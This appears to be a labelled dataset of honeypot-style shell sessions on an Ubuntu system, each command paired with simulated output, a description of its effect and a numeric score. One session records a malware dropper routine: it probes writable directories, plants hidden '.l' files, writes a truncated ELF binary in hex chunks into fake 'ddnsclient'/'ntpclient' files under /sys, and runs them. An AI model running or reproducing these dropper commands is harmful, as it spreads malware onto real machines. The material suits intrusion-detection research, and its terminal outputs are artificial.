3c65ece3659a | 2021_2022 | 25 | ./ddnsclient; chmod 777 ntpclient; ./ntpclient | root@ubuntu:/sys# ./ddnsclient
root@ubuntu:/sys# chmod 777 ntpclient
root@ubuntu:/sys# ./ntpclient
root@ubuntu:/sys# |
- The 'ddnsclient' file in the '/sys' directory was executed.
- The 'ntpclient' file in the '/sys' directory was given full permissions.
- The 'ntpclient' file in the '/sys' directory was executed. | 3 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 0 | >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/tmp# |
- A new file named '.l' was created in the '/tmp' directory.
- The working directory was changed to '/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 1 | >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var# |
- A new file named '.l' was created in the '/var' directory.
- The working directory was changed to '/var'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 2 | >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev# |
- A new file named '.l' was created in the '/dev' directory.
- The working directory was changed to '/dev'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 3 | >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/mnt# |
- A new file named '.l' was created in the '/mnt' directory.
- The working directory was changed to '/mnt'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 4 | >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/run# |
- A new file named '.l' was created in the '/var/run' directory.
- The working directory was changed to '/var/run'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 5 | >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/var/tmp# |
- A new file named '.l' was created in the '/var/tmp' directory.
- The working directory was changed to '/var/tmp'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 6 | >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/# |
- A new file named '.l' was created in the root directory '/'.
- The working directory was changed to '/'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 7 | >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/netslink# |
- A new file named '.l' was created in the '/dev/netslink' directory.
- The working directory was changed to '/dev/netslink'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 8 | >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/dev/shm# |
- A new file named '.l' was created in the '/dev/shm' directory.
- The working directory was changed to '/dev/shm'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 9 | >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/bin# |
- A new file named '.l' was created in the '/bin' directory.
- The working directory was changed to '/bin'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 10 | >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/etc# |
- A new file named '.l' was created in the '/etc' directory.
- The working directory was changed to '/etc'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 11 | >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/boot# |
- A new file named '.l' was created in the '/boot' directory.
- The working directory was changed to '/boot'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 12 | >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/usr# |
- A new file named '.l' was created in the '/usr' directory.
- The working directory was changed to '/usr'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 13 | >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld | root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
PATH_DONE
root@ubuntu:/sys# |
- A new file named '.l' was created in the '/sys' directory.
- The working directory was changed to '/sys'.
- The string 'PATH_DONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 14 | rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient | root@ubuntu:/sys# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
root@ubuntu:/sys# |
- The files 'ddnsclient' and 'ntpclient' in the '/sys' directory were removed.
- The 'echo' command was copied to a new file named 'ddnsclient'.
- The 'ddnsclient' file was emptied.
- The 'ddnsclient' file was copied to a new file named 'ntpclient'.
- Both 'ddnsclient' and 'ntpclient' were given full permissions. | 4 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 15 | echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe\x03\x00\x00\x05\x... | root@ubuntu:/sys# echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe... |
- The 'ddnsclient' file in the '/sys' directory was overwritten with a new binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 16 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1\xe0\x08\x09\xd0\x... | root@ubuntu:/sys# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 17 | echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x... | root@ubuntu:/sys# echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 18 | echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66\xc7\x45\xe0\x02\x... | root@ubuntu:/sys# echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 19 | echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68\xe0\x83\x04\x08\x... | root@ubuntu:/sys# echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 20 | echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14\xfe\xff\xff\x83\x... | root@ubuntu:/sys# echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 21 | echo -ne '\x24\x2c\x8b\x74\x24\x30\x89\x44\x24\x04\x8b\x44\x24\x38\x89\x44\x24\x08\x8b\x44\x24\x20\x53\xe8\x45\x00\x00\x00\x83\xc4\x04\x83\xec\x0c\x50\xe8\x78\x00\x00\x00\x83\xc4\x20\x5b\x5e\x5f\xc3\x90\x57\x53\x89\xd3\x89\xfa\x8b\x7c\x24\x0c\x50\xe8\x06\x00\x00\x00\x89\xda\x5b\x5b\x5f\xc3\x8b\x04\x24\x05\x14\x11\x00\x... | root@ubuntu:/sys# echo -ne '\x8d\x44\x24\x18\x56' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
ECHODONE
root@ubuntu:/sys# |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 22 | echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65\xa1\x00\x00\x00\x... | root@ubuntu:/sys# echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 23 | echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x... | root@ubuntu:/sys# echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 24 | echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x... | root@ubuntu:/sys# echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00... |
- The 'ddnsclient' file in the '/sys' directory was appended with additional binary content.
- The string 'ECHODONE' was printed to the terminal. | 2 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 25 | ./ddnsclient; chmod 777 ntpclient; ./ntpclient | root@ubuntu:/sys# ./ddnsclient
root@ubuntu:/sys# chmod 777 ntpclient
root@ubuntu:/sys# ./ntpclient
root@ubuntu:/sys# |
- The 'ddnsclient' executable was run.
- The 'ntpclient' file in the '/sys' directory was given full permissions.
- The 'ntpclient' executable was run. | 3 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 26 | kill %%1 | root@ubuntu:/sys# kill %%1
root@ubuntu:/sys# |
- The job with job ID 1 was terminated. | 3 | curated_ubuntu |
196a54d64e78 | 2021_2022 | 27 | echo A | root@ubuntu:/sys# echo A
A
root@ubuntu:/sys# |
- The string 'A' was printed to the terminal. | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 0 | sudo -s | root@ubuntu:~# sudo -s
root@ubuntu:~# | The shell has been changed to a root shell using the 'sudo -s' command. | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 1 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 2 | cd .. | root@ubuntu:~# cd ..
root@ubuntu:/# | The working directory was changed to the root directory ('/'). | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 3 | ls | root@ubuntu:/# ls
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@ubuntu:/# | No changes to the system were made. | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 4 | cd medievaltop/ | root@ubuntu:/# cd medievaltop/
root@ubuntu:/medievaltop# | The working directory was changed to '/medievaltop'. | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 5 | ls | root@ubuntu:/medievaltop# ls
file1.txt file2.txt file3.txt directory1 directory2
root@ubuntu:/medievaltop# | No changes to the system were made. | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 6 | cd .. | root@ubuntu:/medievaltop# cd ..
root@ubuntu:/# | The working directory was changed to the root directory ('/'). | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 7 | cd .. | root@ubuntu:/# cd ..
root@ubuntu:/# | No changes to the system were made as the current directory was already the root directory ('/'). | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 8 | ls | root@ubuntu:/# ls
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@ubuntu:/# | No changes to the system were made. | 0 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 9 | cd data | root@ubuntu:/# cd data
root@ubuntu:/data# | The working directory was changed to '/data'. | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 10 | cd .. | root@ubuntu:/data# cd ..
root@ubuntu:/# | The working directory was changed to the root directory ('/'). | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 11 | cd root | root@ubuntu:/# cd root
root@ubuntu:~# | The working directory was changed to '/root'. | 2 | curated_ubuntu |
e3ac6ad7fdae | 2021_2022 | 12 | ls | root@ubuntu:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.